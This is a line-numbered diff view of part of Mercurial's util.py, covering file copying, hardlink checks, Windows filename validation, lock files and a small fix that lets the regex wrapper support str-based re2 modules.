1874 def checksignature(func, depth=1):
1874 def checksignature(func, depth=1):
1875 '''wrap a function with code to check for calling errors'''
1875 '''wrap a function with code to check for calling errors'''
1876
1876
1877 def check(*args, **kwargs):
1877 def check(*args, **kwargs):
1878 try:
1878 try:
1879 return func(*args, **kwargs)
1879 return func(*args, **kwargs)
1880 except TypeError:
1880 except TypeError:
1881 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1881 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1882 raise error.SignatureError
1882 raise error.SignatureError
1883 raise
1883 raise
1884
1884
1885 return check
1885 return check
1886
1886
1887
1887
1888 # a whilelist of known filesystems where hardlink works reliably
1888 # a whilelist of known filesystems where hardlink works reliably
1889 _hardlinkfswhitelist = {
1889 _hardlinkfswhitelist = {
1890 b'apfs',
1890 b'apfs',
1891 b'btrfs',
1891 b'btrfs',
1892 b'ext2',
1892 b'ext2',
1893 b'ext3',
1893 b'ext3',
1894 b'ext4',
1894 b'ext4',
1895 b'hfs',
1895 b'hfs',
1896 b'jfs',
1896 b'jfs',
1897 b'NTFS',
1897 b'NTFS',
1898 b'reiserfs',
1898 b'reiserfs',
1899 b'tmpfs',
1899 b'tmpfs',
1900 b'ufs',
1900 b'ufs',
1901 b'xfs',
1901 b'xfs',
1902 b'zfs',
1902 b'zfs',
1903 }
1903 }
1904
1904
1905
1905
1906 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1906 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1907 """copy a file, preserving mode and optionally other stat info like
1907 """copy a file, preserving mode and optionally other stat info like
1908 atime/mtime
1908 atime/mtime
1909
1909
1910 checkambig argument is used with filestat, and is useful only if
1910 checkambig argument is used with filestat, and is useful only if
1911 destination file is guarded by any lock (e.g. repo.lock or
1911 destination file is guarded by any lock (e.g. repo.lock or
1912 repo.wlock).
1912 repo.wlock).
1913
1913
1914 copystat and checkambig should be exclusive.
1914 copystat and checkambig should be exclusive.
1915 """
1915 """
1916 assert not (copystat and checkambig)
1916 assert not (copystat and checkambig)
1917 oldstat = None
1917 oldstat = None
1918 if os.path.lexists(dest):
1918 if os.path.lexists(dest):
1919 if checkambig:
1919 if checkambig:
1920 oldstat = checkambig and filestat.frompath(dest)
1920 oldstat = checkambig and filestat.frompath(dest)
1921 unlink(dest)
1921 unlink(dest)
1922 if hardlink:
1922 if hardlink:
1923 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1923 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1924 # unless we are confident that dest is on a whitelisted filesystem.
1924 # unless we are confident that dest is on a whitelisted filesystem.
1925 try:
1925 try:
1926 fstype = getfstype(os.path.dirname(dest))
1926 fstype = getfstype(os.path.dirname(dest))
1927 except OSError:
1927 except OSError:
1928 fstype = None
1928 fstype = None
1929 if fstype not in _hardlinkfswhitelist:
1929 if fstype not in _hardlinkfswhitelist:
1930 hardlink = False
1930 hardlink = False
1931 if hardlink:
1931 if hardlink:
1932 try:
1932 try:
1933 oslink(src, dest)
1933 oslink(src, dest)
1934 return
1934 return
1935 except (IOError, OSError):
1935 except (IOError, OSError):
1936 pass # fall back to normal copy
1936 pass # fall back to normal copy
1937 if os.path.islink(src):
1937 if os.path.islink(src):
1938 os.symlink(os.readlink(src), dest)
1938 os.symlink(os.readlink(src), dest)
1939 # copytime is ignored for symlinks, but in general copytime isn't needed
1939 # copytime is ignored for symlinks, but in general copytime isn't needed
1940 # for them anyway
1940 # for them anyway
1941 else:
1941 else:
1942 try:
1942 try:
1943 shutil.copyfile(src, dest)
1943 shutil.copyfile(src, dest)
1944 if copystat:
1944 if copystat:
1945 # copystat also copies mode
1945 # copystat also copies mode
1946 shutil.copystat(src, dest)
1946 shutil.copystat(src, dest)
1947 else:
1947 else:
1948 shutil.copymode(src, dest)
1948 shutil.copymode(src, dest)
1949 if oldstat and oldstat.stat:
1949 if oldstat and oldstat.stat:
1950 newstat = filestat.frompath(dest)
1950 newstat = filestat.frompath(dest)
1951 if newstat.isambig(oldstat):
1951 if newstat.isambig(oldstat):
1952 # stat of copied file is ambiguous to original one
1952 # stat of copied file is ambiguous to original one
1953 advanced = (
1953 advanced = (
1954 oldstat.stat[stat.ST_MTIME] + 1
1954 oldstat.stat[stat.ST_MTIME] + 1
1955 ) & 0x7FFFFFFF
1955 ) & 0x7FFFFFFF
1956 os.utime(dest, (advanced, advanced))
1956 os.utime(dest, (advanced, advanced))
1957 except shutil.Error as inst:
1957 except shutil.Error as inst:
1958 raise error.Abort(stringutil.forcebytestr(inst))
1958 raise error.Abort(stringutil.forcebytestr(inst))
1959
1959
1960
1960
1961 def copyfiles(src, dst, hardlink=None, progress=None):
1961 def copyfiles(src, dst, hardlink=None, progress=None):
1962 """Copy a directory tree using hardlinks if possible."""
1962 """Copy a directory tree using hardlinks if possible."""
1963 num = 0
1963 num = 0
1964
1964
1965 def settopic():
1965 def settopic():
1966 if progress:
1966 if progress:
1967 progress.topic = _(b'linking') if hardlink else _(b'copying')
1967 progress.topic = _(b'linking') if hardlink else _(b'copying')
1968
1968
1969 if os.path.isdir(src):
1969 if os.path.isdir(src):
1970 if hardlink is None:
1970 if hardlink is None:
1971 hardlink = (
1971 hardlink = (
1972 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1972 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1973 )
1973 )
1974 settopic()
1974 settopic()
1975 os.mkdir(dst)
1975 os.mkdir(dst)
1976 for name, kind in listdir(src):
1976 for name, kind in listdir(src):
1977 srcname = os.path.join(src, name)
1977 srcname = os.path.join(src, name)
1978 dstname = os.path.join(dst, name)
1978 dstname = os.path.join(dst, name)
1979 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1979 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1980 num += n
1980 num += n
1981 else:
1981 else:
1982 if hardlink is None:
1982 if hardlink is None:
1983 hardlink = (
1983 hardlink = (
1984 os.stat(os.path.dirname(src)).st_dev
1984 os.stat(os.path.dirname(src)).st_dev
1985 == os.stat(os.path.dirname(dst)).st_dev
1985 == os.stat(os.path.dirname(dst)).st_dev
1986 )
1986 )
1987 settopic()
1987 settopic()
1988
1988
1989 if hardlink:
1989 if hardlink:
1990 try:
1990 try:
1991 oslink(src, dst)
1991 oslink(src, dst)
1992 except (IOError, OSError):
1992 except (IOError, OSError):
1993 hardlink = False
1993 hardlink = False
1994 shutil.copy(src, dst)
1994 shutil.copy(src, dst)
1995 else:
1995 else:
1996 shutil.copy(src, dst)
1996 shutil.copy(src, dst)
1997 num += 1
1997 num += 1
1998 if progress:
1998 if progress:
1999 progress.increment()
1999 progress.increment()
2000
2000
2001 return hardlink, num
2001 return hardlink, num
2002
2002
2003
2003
2004 _winreservednames = {
2004 _winreservednames = {
2005 b'con',
2005 b'con',
2006 b'prn',
2006 b'prn',
2007 b'aux',
2007 b'aux',
2008 b'nul',
2008 b'nul',
2009 b'com1',
2009 b'com1',
2010 b'com2',
2010 b'com2',
2011 b'com3',
2011 b'com3',
2012 b'com4',
2012 b'com4',
2013 b'com5',
2013 b'com5',
2014 b'com6',
2014 b'com6',
2015 b'com7',
2015 b'com7',
2016 b'com8',
2016 b'com8',
2017 b'com9',
2017 b'com9',
2018 b'lpt1',
2018 b'lpt1',
2019 b'lpt2',
2019 b'lpt2',
2020 b'lpt3',
2020 b'lpt3',
2021 b'lpt4',
2021 b'lpt4',
2022 b'lpt5',
2022 b'lpt5',
2023 b'lpt6',
2023 b'lpt6',
2024 b'lpt7',
2024 b'lpt7',
2025 b'lpt8',
2025 b'lpt8',
2026 b'lpt9',
2026 b'lpt9',
2027 }
2027 }
2028 _winreservedchars = b':*?"<>|'
2028 _winreservedchars = b':*?"<>|'
2029
2029
2030
2030
2031 def checkwinfilename(path):
2031 def checkwinfilename(path):
2032 # type: (bytes) -> Optional[bytes]
2032 # type: (bytes) -> Optional[bytes]
2033 r"""Check that the base-relative path is a valid filename on Windows.
2033 r"""Check that the base-relative path is a valid filename on Windows.
2034 Returns None if the path is ok, or a UI string describing the problem.
2034 Returns None if the path is ok, or a UI string describing the problem.
2035
2035
2036 >>> checkwinfilename(b"just/a/normal/path")
2036 >>> checkwinfilename(b"just/a/normal/path")
2037 >>> checkwinfilename(b"foo/bar/con.xml")
2037 >>> checkwinfilename(b"foo/bar/con.xml")
2038 "filename contains 'con', which is reserved on Windows"
2038 "filename contains 'con', which is reserved on Windows"
2039 >>> checkwinfilename(b"foo/con.xml/bar")
2039 >>> checkwinfilename(b"foo/con.xml/bar")
2040 "filename contains 'con', which is reserved on Windows"
2040 "filename contains 'con', which is reserved on Windows"
2041 >>> checkwinfilename(b"foo/bar/xml.con")
2041 >>> checkwinfilename(b"foo/bar/xml.con")
2042 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2042 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2043 "filename contains 'AUX', which is reserved on Windows"
2043 "filename contains 'AUX', which is reserved on Windows"
2044 >>> checkwinfilename(b"foo/bar/bla:.txt")
2044 >>> checkwinfilename(b"foo/bar/bla:.txt")
2045 "filename contains ':', which is reserved on Windows"
2045 "filename contains ':', which is reserved on Windows"
2046 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2046 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2047 "filename contains '\\x07', which is invalid on Windows"
2047 "filename contains '\\x07', which is invalid on Windows"
2048 >>> checkwinfilename(b"foo/bar/bla ")
2048 >>> checkwinfilename(b"foo/bar/bla ")
2049 "filename ends with ' ', which is not allowed on Windows"
2049 "filename ends with ' ', which is not allowed on Windows"
2050 >>> checkwinfilename(b"../bar")
2050 >>> checkwinfilename(b"../bar")
2051 >>> checkwinfilename(b"foo\\")
2051 >>> checkwinfilename(b"foo\\")
2052 "filename ends with '\\', which is invalid on Windows"
2052 "filename ends with '\\', which is invalid on Windows"
2053 >>> checkwinfilename(b"foo\\/bar")
2053 >>> checkwinfilename(b"foo\\/bar")
2054 "directory name ends with '\\', which is invalid on Windows"
2054 "directory name ends with '\\', which is invalid on Windows"
2055 """
2055 """
2056 if path.endswith(b'\\'):
2056 if path.endswith(b'\\'):
2057 return _(b"filename ends with '\\', which is invalid on Windows")
2057 return _(b"filename ends with '\\', which is invalid on Windows")
2058 if b'\\/' in path:
2058 if b'\\/' in path:
2059 return _(b"directory name ends with '\\', which is invalid on Windows")
2059 return _(b"directory name ends with '\\', which is invalid on Windows")
2060 for n in path.replace(b'\\', b'/').split(b'/'):
2060 for n in path.replace(b'\\', b'/').split(b'/'):
2061 if not n:
2061 if not n:
2062 continue
2062 continue
2063 for c in _filenamebytestr(n):
2063 for c in _filenamebytestr(n):
2064 if c in _winreservedchars:
2064 if c in _winreservedchars:
2065 return (
2065 return (
2066 _(
2066 _(
2067 b"filename contains '%s', which is reserved "
2067 b"filename contains '%s', which is reserved "
2068 b"on Windows"
2068 b"on Windows"
2069 )
2069 )
2070 % c
2070 % c
2071 )
2071 )
2072 if ord(c) <= 31:
2072 if ord(c) <= 31:
2073 return _(
2073 return _(
2074 b"filename contains '%s', which is invalid on Windows"
2074 b"filename contains '%s', which is invalid on Windows"
2075 ) % stringutil.escapestr(c)
2075 ) % stringutil.escapestr(c)
2076 base = n.split(b'.')[0]
2076 base = n.split(b'.')[0]
2077 if base and base.lower() in _winreservednames:
2077 if base and base.lower() in _winreservednames:
2078 return (
2078 return (
2079 _(b"filename contains '%s', which is reserved on Windows")
2079 _(b"filename contains '%s', which is reserved on Windows")
2080 % base
2080 % base
2081 )
2081 )
2082 t = n[-1:]
2082 t = n[-1:]
2083 if t in b'. ' and n not in b'..':
2083 if t in b'. ' and n not in b'..':
2084 return (
2084 return (
2085 _(
2085 _(
2086 b"filename ends with '%s', which is not allowed "
2086 b"filename ends with '%s', which is not allowed "
2087 b"on Windows"
2087 b"on Windows"
2088 )
2088 )
2089 % t
2089 % t
2090 )
2090 )
2091
2091
2092
2092
2093 timer = getattr(time, "perf_counter", None)
2093 timer = getattr(time, "perf_counter", None)
2094
2094
2095 if pycompat.iswindows:
2095 if pycompat.iswindows:
2096 checkosfilename = checkwinfilename
2096 checkosfilename = checkwinfilename
2097 if not timer:
2097 if not timer:
2098 timer = time.clock
2098 timer = time.clock
2099 else:
2099 else:
2100 # mercurial.windows doesn't have platform.checkosfilename
2100 # mercurial.windows doesn't have platform.checkosfilename
2101 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2101 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2102 if not timer:
2102 if not timer:
2103 timer = time.time
2103 timer = time.time
2104
2104
2105
2105
2106 def makelock(info, pathname):
2106 def makelock(info, pathname):
2107 """Create a lock file atomically if possible
2107 """Create a lock file atomically if possible
2108
2108
2109 This may leave a stale lock file if symlink isn't supported and signal
2109 This may leave a stale lock file if symlink isn't supported and signal
2110 interrupt is enabled.
2110 interrupt is enabled.
2111 """
2111 """
2112 try:
2112 try:
2113 return os.symlink(info, pathname)
2113 return os.symlink(info, pathname)
2114 except OSError as why:
2114 except OSError as why:
2115 if why.errno == errno.EEXIST:
2115 if why.errno == errno.EEXIST:
2116 raise
2116 raise
2117 except AttributeError: # no symlink in os
2117 except AttributeError: # no symlink in os
2118 pass
2118 pass
2119
2119
2120 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2120 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2121 ld = os.open(pathname, flags)
2121 ld = os.open(pathname, flags)
2122 os.write(ld, info)
2122 os.write(ld, info)
2123 os.close(ld)
2123 os.close(ld)
2124
2124
2125
2125
2126 def readlock(pathname):
2126 def readlock(pathname):
2127 # type: (bytes) -> bytes
2127 # type: (bytes) -> bytes
2128 try:
2128 try:
2129 return readlink(pathname)
2129 return readlink(pathname)
2130 except OSError as why:
2130 except OSError as why:
2131 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2131 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2132 raise
2132 raise
2133 except AttributeError: # no symlink in os
2133 except AttributeError: # no symlink in os
2134 pass
2134 pass
2135 with posixfile(pathname, b'rb') as fp:
2135 with posixfile(pathname, b'rb') as fp:
2136 return fp.read()
2136 return fp.read()
2137
2137
2138
2138
2139 def fstat(fp):
2139 def fstat(fp):
2140 '''stat file object that may not have fileno method.'''
2140 '''stat file object that may not have fileno method.'''
2141 try:
2141 try:
2142 return os.fstat(fp.fileno())
2142 return os.fstat(fp.fileno())
2143 except AttributeError:
2143 except AttributeError:
2144 return os.stat(fp.name)
2144 return os.stat(fp.name)
2145
2145
2146
2146
2147 # File system features
2147 # File system features
2148
2148
2149
2149
2150 def fscasesensitive(path):
2150 def fscasesensitive(path):
2151 # type: (bytes) -> bool
2151 # type: (bytes) -> bool
2152 """
2152 """
2153 Return true if the given path is on a case-sensitive filesystem
2153 Return true if the given path is on a case-sensitive filesystem
2154
2154
2155 Requires a path (like /foo/.hg) ending with a foldable final
2155 Requires a path (like /foo/.hg) ending with a foldable final
2156 directory component.
2156 directory component.
2157 """
2157 """
2158 s1 = os.lstat(path)
2158 s1 = os.lstat(path)
2159 d, b = os.path.split(path)
2159 d, b = os.path.split(path)
2160 b2 = b.upper()
2160 b2 = b.upper()
2161 if b == b2:
2161 if b == b2:
2162 b2 = b.lower()
2162 b2 = b.lower()
2163 if b == b2:
2163 if b == b2:
2164 return True # no evidence against case sensitivity
2164 return True # no evidence against case sensitivity
2165 p2 = os.path.join(d, b2)
2165 p2 = os.path.join(d, b2)
2166 try:
2166 try:
2167 s2 = os.lstat(p2)
2167 s2 = os.lstat(p2)
2168 if s2 == s1:
2168 if s2 == s1:
2169 return False
2169 return False
2170 return True
2170 return True
2171 except OSError:
2171 except OSError:
2172 return True
2172 return True
2173
2173
2174
2174
2175 _re2_input = lambda x: x
2175 try:
2176 try:
2176 import re2 # pytype: disable=import-error
2177 import re2 # pytype: disable=import-error
2177
2178
2178 _re2 = None
2179 _re2 = None
2179 except ImportError:
2180 except ImportError:
2180 _re2 = False
2181 _re2 = False
2181
2182
2182
2183
2183 class _re(object):
2184 class _re(object):
2184 def _checkre2(self):
2185 def _checkre2(self):
2185 global _re2
2186 global _re2
2187 global _re2_input
2186 try:
2188 try:
2187 # check if match works, see issue3964
2189 # check if match works, see issue3964
2188 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2190 check_pattern = br'\[([^\[]+)\]'
2191 check_input = b'[ui]'
2192 _re2 = bool(re2.match(check_pattern, check_input))
2189 except ImportError:
2193 except ImportError:
2190 _re2 = False
2194 _re2 = False
2195 except TypeError:
2196 # the `pyre-2` project provides a re2 module that accept bytes
2197 # the `fb-re2` project provides a re2 module that acccept sysstr
2198 check_pattern = pycompat.sysstr(check_pattern)
2199 check_input = pycompat.sysstr(check_input)
2200 _re2 = bool(re2.match(check_pattern, check_input))
2201 _re2_input = pycompat.sysstr
2191
2202
2192 def compile(self, pat, flags=0):
2203 def compile(self, pat, flags=0):
2193 """Compile a regular expression, using re2 if possible
2204 """Compile a regular expression, using re2 if possible
2194
2205
2195 For best performance, use only re2-compatible regexp features. The
2206 For best performance, use only re2-compatible regexp features. The
2196 only flags from the re module that are re2-compatible are
2207 only flags from the re module that are re2-compatible are
2197 IGNORECASE and MULTILINE."""
2208 IGNORECASE and MULTILINE."""
2198 if _re2 is None:
2209 if _re2 is None:
2199 self._checkre2()
2210 self._checkre2()
2200 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2211 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2201 if flags & remod.IGNORECASE:
2212 if flags & remod.IGNORECASE:
2202 pat = b'(?i)' + pat
2213 pat = b'(?i)' + pat
2203 if flags & remod.MULTILINE:
2214 if flags & remod.MULTILINE:
2204 pat = b'(?m)' + pat
2215 pat = b'(?m)' + pat
2205 try:
2216 try:
2206 return re2.compile(pat)
2217 return re2.compile(_re2_input(pat))
2207 except re2.error:
2218 except re2.error:
2208 pass
2219 pass
2209 return remod.compile(pat, flags)
2220 return remod.compile(pat, flags)
2210
2221
2211 @propertycache
2222 @propertycache
2212 def escape(self):
2223 def escape(self):
2213 """Return the version of escape corresponding to self.compile.
2224 """Return the version of escape corresponding to self.compile.
2214
2225
2215 This is imperfect because whether re2 or re is used for a particular
2226 This is imperfect because whether re2 or re is used for a particular
2216 function depends on the flags, etc, but it's the best we can do.
2227 function depends on the flags, etc, but it's the best we can do.
2217 """
2228 """
2218 global _re2
2229 global _re2
2219 if _re2 is None:
2230 if _re2 is None:
2220 self._checkre2()
2231 self._checkre2()
2221 if _re2:
2232 if _re2:
2222 return re2.escape
2233 return re2.escape
2223 else:
2234 else:
2224 return remod.escape
2235 return remod.escape
2225
2236
2226
2237
2227 re = _re()
2238 re = _re()
2228
2239
2229 _fspathcache = {}
2240 _fspathcache = {}
2230
2241
2231
2242
2232 def fspath(name, root):
2243 def fspath(name, root):
2233 # type: (bytes, bytes) -> bytes
2244 # type: (bytes, bytes) -> bytes
2234 """Get name in the case stored in the filesystem
2245 """Get name in the case stored in the filesystem
2235
2246
2236 The name should be relative to root, and be normcase-ed for efficiency.
2247 The name should be relative to root, and be normcase-ed for efficiency.
2237
2248
2238 Note that this function is unnecessary, and should not be
2249 Note that this function is unnecessary, and should not be
2239 called, for case-sensitive filesystems (simply because it's expensive).
2250 called, for case-sensitive filesystems (simply because it's expensive).
2240
2251
2241 The root should be normcase-ed, too.
2252 The root should be normcase-ed, too.
2242 """
2253 """
2243
2254
2244 def _makefspathcacheentry(dir):
2255 def _makefspathcacheentry(dir):
2245 return {normcase(n): n for n in os.listdir(dir)}
2256 return {normcase(n): n for n in os.listdir(dir)}
2246
2257
2247 seps = pycompat.ossep
2258 seps = pycompat.ossep
2248 if pycompat.osaltsep:
2259 if pycompat.osaltsep:
2249 seps = seps + pycompat.osaltsep
2260 seps = seps + pycompat.osaltsep
2250 # Protect backslashes. This gets silly very quickly.
2261 # Protect backslashes. This gets silly very quickly.
2251 seps.replace(b'\\', b'\\\\')
2262 seps.replace(b'\\', b'\\\\')
2252 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2263 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2253 dir = os.path.normpath(root)
2264 dir = os.path.normpath(root)
2254 result = []
2265 result = []
2255 for part, sep in pattern.findall(name):
2266 for part, sep in pattern.findall(name):
2256 if sep:
2267 if sep:
2257 result.append(sep)
2268 result.append(sep)
2258 continue
2269 continue
2259
2270
2260 if dir not in _fspathcache:
2271 if dir not in _fspathcache:
2261 _fspathcache[dir] = _makefspathcacheentry(dir)
2272 _fspathcache[dir] = _makefspathcacheentry(dir)
2262 contents = _fspathcache[dir]
2273 contents = _fspathcache[dir]
2263
2274
2264 found = contents.get(part)
2275 found = contents.get(part)
2265 if not found:
2276 if not found:
2266 # retry "once per directory" per "dirstate.walk" which
2277 # retry "once per directory" per "dirstate.walk" which
2267 # may take place for each patches of "hg qpush", for example
2278 # may take place for each patches of "hg qpush", for example
2268 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2279 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2269 found = contents.get(part)
2280 found = contents.get(part)
2270
2281
2271 result.append(found or part)
2282 result.append(found or part)
2272 dir = os.path.join(dir, part)
2283 dir = os.path.join(dir, part)
2273
2284
2274 return b''.join(result)
2285 return b''.join(result)
2275
2286
2276
2287
2277 def checknlink(testfile):
2288 def checknlink(testfile):
2278 # type: (bytes) -> bool
2289 # type: (bytes) -> bool
2279 '''check whether hardlink count reporting works properly'''
2290 '''check whether hardlink count reporting works properly'''
2280
2291
2281 # testfile may be open, so we need a separate file for checking to
2292 # testfile may be open, so we need a separate file for checking to
2282 # work around issue2543 (or testfile may get lost on Samba shares)
2293 # work around issue2543 (or testfile may get lost on Samba shares)
2283 f1, f2, fp = None, None, None
2294 f1, f2, fp = None, None, None
2284 try:
2295 try:
2285 fd, f1 = pycompat.mkstemp(
2296 fd, f1 = pycompat.mkstemp(
2286 prefix=b'.%s-' % os.path.basename(testfile),
2297 prefix=b'.%s-' % os.path.basename(testfile),
2287 suffix=b'1~',
2298 suffix=b'1~',
2288 dir=os.path.dirname(testfile),
2299 dir=os.path.dirname(testfile),
2289 )
2300 )
2290 os.close(fd)
2301 os.close(fd)
2291 f2 = b'%s2~' % f1[:-2]
2302 f2 = b'%s2~' % f1[:-2]
2292
2303
2293 oslink(f1, f2)
2304 oslink(f1, f2)
2294 # nlinks() may behave differently for files on Windows shares if
2305 # nlinks() may behave differently for files on Windows shares if
2295 # the file is open.
2306 # the file is open.
2296 fp = posixfile(f2)
2307 fp = posixfile(f2)
2297 return nlinks(f2) > 1
2308 return nlinks(f2) > 1
2298 except OSError:
2309 except OSError:
2299 return False
2310 return False
2300 finally:
2311 finally:
2301 if fp is not None:
2312 if fp is not None:
2302 fp.close()
2313 fp.close()
2303 for f in (f1, f2):
2314 for f in (f1, f2):
2304 try:
2315 try:
2305 if f is not None:
2316 if f is not None:
2306 os.unlink(f)
2317 os.unlink(f)
2307 except OSError:
2318 except OSError:
2308 pass
2319 pass
2309
2320
2310
2321
2311 def endswithsep(path):
2322 def endswithsep(path):
2312 # type: (bytes) -> bool
2323 # type: (bytes) -> bool
2313 '''Check path ends with os.sep or os.altsep.'''
2324 '''Check path ends with os.sep or os.altsep.'''
2314 return bool( # help pytype
2325 return bool( # help pytype
2315 path.endswith(pycompat.ossep)
2326 path.endswith(pycompat.ossep)
2316 or pycompat.osaltsep
2327 or pycompat.osaltsep
2317 and path.endswith(pycompat.osaltsep)
2328 and path.endswith(pycompat.osaltsep)
2318 )
2329 )
2319
2330
2320
2331
2321 def splitpath(path):
2332 def splitpath(path):
2322 # type: (bytes) -> List[bytes]
2333 # type: (bytes) -> List[bytes]
2323 """Split path by os.sep.
2334 """Split path by os.sep.
2324 Note that this function does not use os.altsep because this is
2335 Note that this function does not use os.altsep because this is
2325 an alternative of simple "xxx.split(os.sep)".
2336 an alternative of simple "xxx.split(os.sep)".
2326 It is recommended to use os.path.normpath() before using this
2337 It is recommended to use os.path.normpath() before using this
2327 function if need."""
2338 function if need."""
2328 return path.split(pycompat.ossep)
2339 return path.split(pycompat.ossep)
2329
2340
2330
2341
2331 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2342 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2332 """Create a temporary file with the same contents from name
2343 """Create a temporary file with the same contents from name
2333
2344
2334 The permission bits are copied from the original file.
2345 The permission bits are copied from the original file.
2335
2346
2336 If the temporary file is going to be truncated immediately, you
2347 If the temporary file is going to be truncated immediately, you
2337 can use emptyok=True as an optimization.
2348 can use emptyok=True as an optimization.
2338
2349
2339 Returns the name of the temporary file.
2350 Returns the name of the temporary file.
2340 """
2351 """
2341 d, fn = os.path.split(name)
2352 d, fn = os.path.split(name)
2342 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2353 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2343 os.close(fd)
2354 os.close(fd)
2344 # Temporary files are created with mode 0600, which is usually not
2355 # Temporary files are created with mode 0600, which is usually not
2345 # what we want. If the original file already exists, just copy
2356 # what we want. If the original file already exists, just copy
2346 # its mode. Otherwise, manually obey umask.
2357 # its mode. Otherwise, manually obey umask.
2347 copymode(name, temp, createmode, enforcewritable)
2358 copymode(name, temp, createmode, enforcewritable)
2348
2359
2349 if emptyok:
2360 if emptyok:
2350 return temp
2361 return temp
2351 try:
2362 try:
2352 try:
2363 try:
2353 ifp = posixfile(name, b"rb")
2364 ifp = posixfile(name, b"rb")
2354 except IOError as inst:
2365 except IOError as inst:
2355 if inst.errno == errno.ENOENT:
2366 if inst.errno == errno.ENOENT:
2356 return temp
2367 return temp
2357 if not getattr(inst, 'filename', None):
2368 if not getattr(inst, 'filename', None):
2358 inst.filename = name
2369 inst.filename = name
2359 raise
2370 raise
2360 ofp = posixfile(temp, b"wb")
2371 ofp = posixfile(temp, b"wb")
2361 for chunk in filechunkiter(ifp):
2372 for chunk in filechunkiter(ifp):
2362 ofp.write(chunk)
2373 ofp.write(chunk)
2363 ifp.close()
2374 ifp.close()
2364 ofp.close()
2375 ofp.close()
2365 except: # re-raises
2376 except: # re-raises
2366 try:
2377 try:
2367 os.unlink(temp)
2378 os.unlink(temp)
2368 except OSError:
2379 except OSError:
2369 pass
2380 pass
2370 raise
2381 raise
2371 return temp
2382 return temp
2372
2383
2373
2384
2374 class filestat(object):
2385 class filestat(object):
2375 """help to exactly detect change of a file
2386 """help to exactly detect change of a file
2376
2387
2377 'stat' attribute is result of 'os.stat()' if specified 'path'
2388 'stat' attribute is result of 'os.stat()' if specified 'path'
2378 exists. Otherwise, it is None. This can avoid preparative
2389 exists. Otherwise, it is None. This can avoid preparative
2379 'exists()' examination on client side of this class.
2390 'exists()' examination on client side of this class.
2380 """
2391 """
2381
2392
2382 def __init__(self, stat):
2393 def __init__(self, stat):
2383 self.stat = stat
2394 self.stat = stat
2384
2395
2385 @classmethod
2396 @classmethod
2386 def frompath(cls, path):
2397 def frompath(cls, path):
2387 try:
2398 try:
2388 stat = os.stat(path)
2399 stat = os.stat(path)
2389 except OSError as err:
2400 except OSError as err:
2390 if err.errno != errno.ENOENT:
2401 if err.errno != errno.ENOENT:
2391 raise
2402 raise
2392 stat = None
2403 stat = None
2393 return cls(stat)
2404 return cls(stat)
2394
2405
2395 @classmethod
2406 @classmethod
2396 def fromfp(cls, fp):
2407 def fromfp(cls, fp):
2397 stat = os.fstat(fp.fileno())
2408 stat = os.fstat(fp.fileno())
2398 return cls(stat)
2409 return cls(stat)
2399
2410
2400 __hash__ = object.__hash__
2411 __hash__ = object.__hash__
2401
2412
2402 def __eq__(self, old):
2413 def __eq__(self, old):
2403 try:
2414 try:
2404 # if ambiguity between stat of new and old file is
2415 # if ambiguity between stat of new and old file is
2405 # avoided, comparison of size, ctime and mtime is enough
2416 # avoided, comparison of size, ctime and mtime is enough
2406 # to exactly detect change of a file regardless of platform
2417 # to exactly detect change of a file regardless of platform
2407 return (
2418 return (
2408 self.stat.st_size == old.stat.st_size
2419 self.stat.st_size == old.stat.st_size
2409 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2420 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2410 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2421 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2411 )
2422 )
2412 except AttributeError:
2423 except AttributeError:
2413 pass
2424 pass
2414 try:
2425 try:
2415 return self.stat is None and old.stat is None
2426 return self.stat is None and old.stat is None
2416 except AttributeError:
2427 except AttributeError:
2417 return False
2428 return False
2418
2429
2419 def isambig(self, old):
2430 def isambig(self, old):
2420 """Examine whether new (= self) stat is ambiguous against old one
2431 """Examine whether new (= self) stat is ambiguous against old one
2421
2432
2422 "S[N]" below means stat of a file at N-th change:
2433 "S[N]" below means stat of a file at N-th change:
2423
2434
2424 - S[n-1].ctime < S[n].ctime: can detect change of a file
2435 - S[n-1].ctime < S[n].ctime: can detect change of a file
2425 - S[n-1].ctime == S[n].ctime
2436 - S[n-1].ctime == S[n].ctime
2426 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2437 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2427 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2438 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
